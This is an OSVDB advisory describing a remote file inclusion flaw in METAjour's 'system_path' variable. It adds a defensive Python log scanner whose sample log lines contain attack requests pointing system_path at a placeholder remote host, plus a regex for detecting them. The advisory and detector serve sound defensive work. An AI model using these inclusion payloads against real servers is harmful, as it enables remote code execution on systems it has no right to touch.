METAjour edocument_edoccorrectionclass.php system_path Variable Remote File Inclusion

2006-05-31T00:00:00
ID OSVDB:39472
Type osvdb
Reporter OSVDB
Modified 2006-05-31T00:00:00

Description

Vulnerability Description

METAjour contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'edocument_edoccorrectionclass.php' not properly sanitizing user input supplied to the 'system_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
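A defender can look for this pattern in web server access logs. The following is an added example, not part of the OSVDB entry or of METAjour: it flags requests to the script named above whose 'system_path' value begins with a URL scheme. The log format (combined), the '/metajour/' directory and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter named in this advisory.
SCRIPT = "edocument_edoccorrectionclass.php"
PARAM = "system_path"
# URL or stream-wrapper scheme at the start of a value (http://, ftp://, ...).
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Request portion of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_system_path(line):
    """Return the decoded system_path value if the request targets the
    advisory's script and the value starts with a URL scheme, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/" + SCRIPT):
        return None
    # parse_qsl percent-decodes, so an encoded scheme (ftp%3A%2F%2F) is caught too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == PARAM and SCHEME.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, value) for every flagged line, 1-indexed."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_system_path(line)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample log lines (not from a real server); the directory is assumed.
SAMPLE = [
    '192.0.2.10 - - [31/May/2006:10:00:01 +0000] "GET /metajour/index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [31/May/2006:10:00:07 +0000] "GET /metajour/edocument_edoccorrectionclass.php?system_path=http://host.example.invalid/x HTTP/1.1" 200 0',
    '192.0.2.44 - - [31/May/2006:10:00:09 +0000] "GET /metajour/edocument_edoccorrectionclass.php?system_path=ftp%3A%2F%2Fhost.example.invalid%2Fx HTTP/1.0" 200 0',
    '192.0.2.11 - - [31/May/2006:10:01:00 +0000] "GET /metajour/edocument_edoccorrectionclass.php?id=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE):
        print(f"line {n}: {PARAM}={value}")
```

With register_globals on, PHP also registers POST and cookie values as globals, and those do not appear in a standard access log, so this check covers the query string only.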

References:

Vendor URL: http://www.metajour.org/
Secunia Advisory ID: 20404
Related OSVDB ID: 39476, 39473, 1018364, 1018370, 1018375, 1018376, 1018377, 1018379, 1018382, 1018383, 1018385, 1018390, 1018393, 1018402, 1018403, 1018405, 1018406, 1018408, 1018411, 1018412, 1018418, 1018424, 1018426, 1018428, 1018429, 1018430, 1018431, 1018432, 1018363, 1018366, 1018367, 1018368, 1018388, 1018389, 1018395, 1018398, 1018399, 1018400, 1018401, 1018404, 1018413, 1018416, 1018425, 1018427, 39475, 1018365, 1018369, 1018371, 1018372, 1018378, 1018386, 1018391, 1018397, 1018415, 1018417, 1018419, 39480, 39474, 39472, 1018362, 1018373, 1018374, 1018380, 1018381, 1018384, 1018387, 1018392, 1018394, 1018396, 1018407, 1018409, 1018410, 1018414, 1018420, 1018421, 1018422, 1018423
Generic Exploit URL: http://milw0rm.com/exploits/1855
FrSIRT Advisory: ADV-2006-2077
CVE-2006-2768
Bugtraq ID: 18211